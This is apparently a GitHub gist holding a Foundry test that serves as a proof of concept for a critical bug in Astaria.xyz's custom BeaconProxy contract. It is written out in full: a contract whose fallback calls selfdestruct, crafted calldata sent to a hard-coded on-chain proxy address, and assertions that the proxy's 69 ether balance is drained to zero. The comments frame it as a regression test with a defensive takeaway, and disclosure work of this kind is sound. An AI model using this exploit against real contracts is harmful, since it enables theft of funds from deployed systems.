@devtooligan
Last active April 9, 2024 16:10
PoC of crit bug found in Astaria.xyz's custom BeaconProxy contract
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
/// @notice Stand-in "implementation" contract used by the PoC test in this file to show
///         the impact of a proxy that can be pointed at caller-chosen code.
/// @dev Only meaningful inside the local Foundry test; it holds no state.
contract SheHateMe {
    /// @notice Reports this contract itself as the implementation address.
    /// @dev The argument is ignored; the return value is always `address(this)`.
    function getImpl(uint8 x) public returns (address) {
        address self = address(this);
        return self;
    }

    /// @notice Accepts plain ether transfers (empty calldata).
    receive() external payable {}

    /// @notice Handles every call whose calldata does not match `getImpl(uint8)`.
    /// @dev SELFDESTRUCT acts on the executing context. When this code is reached through a
    ///      delegatecall, the balance forwarded to `msg.sender` is the delegating contract's,
    ///      not this contract's. Since EIP-6780 (Cancun) the opcode still forwards the whole
    ///      balance but removes code only when the contract was created in the same
    ///      transaction.
    fallback() external {
        address payable beneficiary = payable(msg.sender);
        selfdestruct(beneficiary);
    }
}
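/// @notice Foundry regression test showing that a single external call can empty the
///         balance of the contract at `proxy`.
/// @dev Must run against a fork where `proxy` has code (e.g. `forge test --fork-url <RPC_URL>`).
///      The proxy's source is not part of this file. Defensive takeaway: a proxy must not
///      resolve its beacon or implementation from bytes the caller supplies, and a clone
///      template must not be usable when called directly.
contract HackAstaria is Test {
    /// @notice Stand-in implementation deployed in `setUp`.
    SheHateMe public sheHateMe;

    /// @notice Address of the contract under test, taken from the original PoC.
    address public proxy = payable(address(0x1bee35414De2691454bd7090DB64ececFB65581f));

    /// @notice Deploys the stand-in implementation and funds the proxy with 69 ether.
    function setUp() public {
        sheHateMe = new SheHateMe();
        vm.deal(proxy, 69 ether);
    }

    /// @notice Sends the crafted calldata to the proxy and checks that its balance drops to zero.
    function testHackinItInSanDiego() public {
        // Without a fork the address holds no code: the low-level call would then "succeed"
        // without doing anything and the final balance check would fail with a misleading message.
        assertGt(proxy.code.length, 0, "proxy has no code - run this test against a fork");

        assertEq(proxy.balance, 69 ether); // proxy has 69 ether

        // the secret sauce
        // Layout as encoded here (39 bytes): 4-byte selector, one 32-byte word holding the
        // stand-in's address right-aligned, one byte 0x69, then the two bytes 0x0015.
        // NOTE(review): the trailing bytes look like an appended-arguments footer ending in a
        // uint16 length, as used by clone-with-immutable-args proxies - confirm against the proxy.
        bytes memory data = abi.encodePacked(
            bytes4(uint32(0x1badbabe)),
            uint(uint160(address(sheHateMe))),
            uint8(0x69),
            uint16(0x0015)
        );

        // Return data is not used, so it is not bound (avoids an unused-variable warning).
        (bool success, ) = proxy.call(data);
        assertTrue(success);

        // The balance is swept by SELFDESTRUCT; since EIP-6780 the code itself is removed only
        // if the contract was created in the same transaction.
        assertEq(proxy.balance, 0); // proxy has no ether (because it selfdestructed)
        console.log("hack successful");
    }
}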